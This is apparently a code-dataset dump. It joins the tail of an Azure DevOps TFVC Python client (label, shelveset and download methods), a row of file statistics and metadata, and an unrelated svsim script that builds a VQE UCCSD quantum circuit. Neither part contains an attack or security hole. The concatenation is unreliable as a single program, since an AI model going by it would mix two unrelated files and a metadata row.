route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
if download is not None:
query_parameters['download'] = self._serialize.query('download', download, 'bool')
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
# The nested version descriptor is flattened into dotted query parameters.
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
# application/zip requests the item (or folder) packaged as a zip archive.
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='application/zip')
# An optional `callback` kwarg observes download progress while streaming.
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_label_items(self, label_id, top=None, skip=None):
"""GetLabelItems.
Get items under a label.
:param str label_id: Unique identifier of label
:param int top: Max number of items to return
:param int skip: Number of items to skip
:rtype: [TfvcItem]
"""
route_values = {}
if label_id is not None:
route_values['labelId'] = self._serialize.url('label_id', label_id, 'str')
# $top / $skip implement server-side paging of the item list.
query_parameters = {}
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='06166e34-de17-4b60-8cd1-23182a346fda',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcItem]', self._unwrap_collection(response))
def get_label(self, label_id, request_data, project=None):
"""GetLabel.
Get a single deep label.
:param str label_id: Unique identifier of label
:param :class:`<TfvcLabelRequestData> <tfvc.v4_0.models.TfvcLabelRequestData>` request_data: maxItemCount
:param str project: Project ID or project name
:rtype: :class:`<TfvcLabel> <tfvc.v4_0.models.TfvcLabel>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if label_id is not None:
route_values['labelId'] = self._serialize.url('label_id', label_id, 'str')
# The nested request-data object is flattened into dotted query
# parameters (requestData.<field>) rather than serialized as a body.
query_parameters = {}
if request_data is not None:
if request_data.label_scope is not None:
query_parameters['requestData.labelScope'] = request_data.label_scope
if request_data.name is not None:
query_parameters['requestData.name'] = request_data.name
if request_data.owner is not None:
query_parameters['requestData.owner'] = request_data.owner
if request_data.item_label_filter is not None:
query_parameters['requestData.itemLabelFilter'] = request_data.item_label_filter
if request_data.max_item_count is not None:
query_parameters['requestData.maxItemCount'] = request_data.max_item_count
if request_data.include_links is not None:
query_parameters['requestData.includeLinks'] = request_data.include_links
response = self._send(http_method='GET',
location_id='a5d9bd7f-b661-4d0e-b9be-d9c16affae54',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TfvcLabel', response)
def get_labels(self, request_data, project=None, top=None, skip=None):
"""GetLabels.
Get a collection of shallow label references.
:param :class:`<TfvcLabelRequestData> <tfvc.v4_0.models.TfvcLabelRequestData>` request_data: labelScope, name, owner, and itemLabelFilter
:param str project: Project ID or project name
:param int top: Max number of labels to return
:param int skip: Number of labels to skip
:rtype: [TfvcLabelRef]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
# The nested request-data object is flattened into dotted query
# parameters (requestData.<field>); $top/$skip page the result list.
query_parameters = {}
if request_data is not None:
if request_data.label_scope is not None:
query_parameters['requestData.labelScope'] = request_data.label_scope
if request_data.name is not None:
query_parameters['requestData.name'] = request_data.name
if request_data.owner is not None:
query_parameters['requestData.owner'] = request_data.owner
if request_data.item_label_filter is not None:
query_parameters['requestData.itemLabelFilter'] = request_data.item_label_filter
if request_data.max_item_count is not None:
query_parameters['requestData.maxItemCount'] = request_data.max_item_count
if request_data.include_links is not None:
query_parameters['requestData.includeLinks'] = request_data.include_links
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='a5d9bd7f-b661-4d0e-b9be-d9c16affae54',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcLabelRef]', self._unwrap_collection(response))
def get_shelveset_changes(self, shelveset_id, top=None, skip=None):
"""GetShelvesetChanges.
Get changes included in a shelveset.
:param str shelveset_id: Shelveset's unique ID
:param int top: Max number of changes to return
:param int skip: Number of changes to skip
:rtype: [TfvcChange]
"""
query_parameters = {}
if shelveset_id is not None:
query_parameters['shelvesetId'] = self._serialize.query('shelveset_id', shelveset_id, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='dbaf075b-0445-4c34-9e5b-82292f856522',
version='4.0',
query_parameters=query_parameters)
return self._deserialize('[TfvcChange]', self._unwrap_collection(response))
def get_shelveset(self, shelveset_id, request_data=None):
"""GetShelveset.
Get a single deep shelveset.
:param str shelveset_id: Shelveset's unique ID
:param :class:`<TfvcShelvesetRequestData> <tfvc.v4_0.models.TfvcShelvesetRequestData>` request_data: includeDetails, includeWorkItems, maxChangeCount, and maxCommentLength
:rtype: :class:`<TfvcShelveset> <tfvc.v4_0.models.TfvcShelveset>`
"""
query_parameters = {}
if shelveset_id is not None:
query_parameters['shelvesetId'] = self._serialize.query('shelveset_id', shelveset_id, 'str')
if request_data is not None:
if request_data.name is not None:
query_parameters['requestData.name'] = request_data.name
if request_data.owner is not None:
query_parameters['requestData.owner'] = request_data.owner
if request_data.max_comment_length is not None:
query_parameters['requestData.maxCommentLength'] = request_data.max_comment_length
if request_data.max_change_count is not None:
query_parameters['requestData.maxChangeCount'] = request_data.max_change_count
if request_data.include_details is not None:
query_parameters['requestData.includeDetails'] = request_data.include_details
if request_data.include_work_items is not None:
query_parameters['requestData.includeWorkItems'] = request_data.include_work_items
if request_data.include_links is not None:
query_parameters['requestData.includeLinks'] = request_data.include_links
response = self._send(http_method='GET',
location_id='e36d44fb-e907-4b0a-b194-f83f1ed32ad3',
version='4.0',
query_parameters=query_parameters)
return self._deserialize('TfvcShelveset', response)
def get_shelvesets(self, request_data=None, top=None, skip=None):
"""GetShelvesets.
Return a collection of shallow shelveset references.
:param :class:`<TfvcShelvesetRequestData> <tfvc.v4_0.models.TfvcShelvesetRequestData>` request_data: name, owner, and maxCommentLength
:param int top: Max number of shelvesets to return
:param int skip: Number of shelvesets to skip
:rtype: [TfvcShelvesetRef]
"""
query_parameters = {}
if request_data is not None:
if request_data.name is not None:
query_parameters['requestData.name'] = request_data.name
if request_data.owner is not None:
query_parameters['requestData.owner'] = request_data.owner
if request_data.max_comment_length is not None:
query_parameters['requestData.maxCommentLength'] = request_data.max_comment_length
if request_data.max_change_count is not None:
query_parameters['requestData.maxChangeCount'] = request_data.max_change_count
if request_data.include_details is not None:
query_parameters['requestData.includeDetails'] = request_data.include_details
if request_data.include_work_items is not None:
query_parameters['requestData.includeWorkItems'] = request_data.include_work_items
if request_data.include_links is not None:
query_parameters['requestData.includeLinks'] = request_data.include_links
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='e36d44fb-e907-4b0a-b194-f83f1ed32ad3',
version='4.0',
query_parameters=query_parameters)
return self._deserialize('[TfvcShelvesetRef]', self._unwrap_collection(response))
def get_shelveset_work_items(self, shelveset_id):
"""GetShelvesetWorkItems.
Get work items associated with a shelveset.
:param str shelveset_id: Shelveset's unique ID
:rtype: [AssociatedWorkItem]
"""
query_parameters = {}
if shelveset_id is not None:
query_parameters['shelvesetId'] = self._serialize.query('shelveset_id', shelveset_id, 'str')
response = self._send(http_method='GET',
location_id='a7a0c1c1-373e-425a-b031-a519474d743d',
version='4.0',
query_parameters=query_parameters)
return self._deserialize('[AssociatedWorkItem]', self._unwrap_collection(response))
| 56.746575
| 265
| 0.630416
| 4,536
| 41,425
| 5.535494
| 0.077381
| 0.10096
| 0.052332
| 0.06412
| 0.856705
| 0.847903
| 0.83707
| 0.816122
| 0.799395
| 0.791589
| 0
| 0.018637
| 0.272058
| 41,425
| 729
| 266
| 56.824417
| 0.814028
| 0.192251
| 0
| 0.873518
| 0
| 0
| 0.138833
| 0.066996
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047431
| false
| 0
| 0.005929
| 0
| 0.102767
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6eed11252cadff312444bf36bdde91223809a1b
| 255,942
|
py
|
Python
|
svsim/tool/vqe_uccsd_n8.py
|
yukwangmin/SV-Sim
|
1b6b71cb490e7a1eac3d6ebc24777590d48378de
|
[
"MIT"
] | null | null | null |
svsim/tool/vqe_uccsd_n8.py
|
yukwangmin/SV-Sim
|
1b6b71cb490e7a1eac3d6ebc24777590d48378de
|
[
"MIT"
] | null | null | null |
svsim/tool/vqe_uccsd_n8.py
|
yukwangmin/SV-Sim
|
1b6b71cb490e7a1eac3d6ebc24777590d48378de
|
[
"MIT"
] | null | null | null |
import sys

# SV-Sim OpenMP backend wrapper; provides the Simulation class used below.
import svsim_py_omp_wrapper as svsim

# Usage: python circuit.py n_qubits n_gpus
if len(sys.argv) != 3:
    print('$python circuit.py n_qubits n_gpus')
    # sys.exit(1) instead of exit(): the site-module exit() helper is not
    # guaranteed to exist in all runtimes, and a usage error should report a
    # nonzero status rather than the previous implicit 0.
    sys.exit(1)

# argv[1]: number of qubits; argv[2]: number of GPUs/threads for the backend.
sim = svsim.Simulation(int(sys.argv[1]), int(sys.argv[2]))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(3))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(3))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(3))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(3))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
